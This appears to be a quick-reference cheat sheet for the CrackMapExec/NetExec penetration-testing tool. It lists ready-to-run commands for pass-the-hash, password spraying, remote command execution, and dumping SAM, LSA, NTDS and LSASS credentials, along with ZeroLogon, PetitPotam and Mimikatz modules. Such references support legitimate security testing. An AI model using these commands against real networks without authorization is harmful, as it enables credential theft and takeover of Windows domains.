Quick Reference

Swiss army knife for pentesting networks. Note: CME is now maintained as NetExec (nxc).

🔌 Protocols

SMBcme smb 192.168.1.0/24
WinRMcme winrm 192.168.1.10
LDAPcme ldap 192.168.1.10
MSSQLcme mssql 192.168.1.10
SSHcme ssh 192.168.1.0/24
RDPcme rdp 192.168.1.10
FTPcme ftp 192.168.1.10

🔐 Authentication

Domain usercme smb IP -u user -p pass -d DOMAIN
Local usercme smb IP -u user -p pass --local-auth
Pass the Hashcme smb IP -u user -H NTLM_HASH
Kerberoscme smb IP -k
Null sessioncme smb IP -u '' -p ''
User listcme smb IP -u users.txt -p pass
Pass listcme smb IP -u user -p passwords.txt

📊 SMB Enumeration

List shares--shares
List users--users
List groups--groups
Logged on users--loggedon-users
Sessions--sessions
Password policy--pass-pol
RID brute--rid-brute
Computers--computers

💻 Command Execution

CMD-x "whoami"
PowerShell-X "Get-Process"
Method: ATExec--exec-method atexec
Method: WMI--exec-method wmiexec
Method: SMBExec--exec-method smbexec
WinRM execcme winrm IP -u user -p pass -x "whoami"

🔑 Credential Dumping

SAM hashes--sam
LSA secrets--lsa
NTDS.dit--ntds
NTDS VSS method--ntds vss
LSASS dump-M lsassy
DPAPI-M dpapi_secrets

🧩 Useful Modules

List modulescme smb -L
Module infocme smb -M module --options
Spider shares-M spider_plus
PetitPotam-M petitpotam
ZeroLogon-M zerologon
GPP password-M gpp_password
Mimikatz-M mimikatz
Web delivery-M web_delivery

🕷️ Share Spidering

Spider specific share-M spider_plus -o SHARE=C$
Search for files--spider C$ --pattern *.kdbx
Read file content--spider C$ --content --pattern flag.txt
Get file--get-file \\share\\file local_file
Put file--put-file local \\share\\file

💾 Database

Enter DB modecmedb
List hostshosts
List credscreds
Export dataexport creds csv output.csv

🎯 Common Workflows

Network Discovery

cme smb 192.168.1.0/24

Password Spray

cme smb IP -u users.txt -p 'Password1' --continue-on-success

Dump Domain Hashes

cme smb DC_IP -u admin -p pass --ntds

Find Local Admin

cme smb 192.168.1.0/24 -u user -H hash --local-auth

Related Topics

← All Cheatsheets

Browse all quick reference guides

Lateral Movement

Moving through networks

SMB Enumeration

SMB enumeration techniques

Impacket Cheatsheet

Python network tools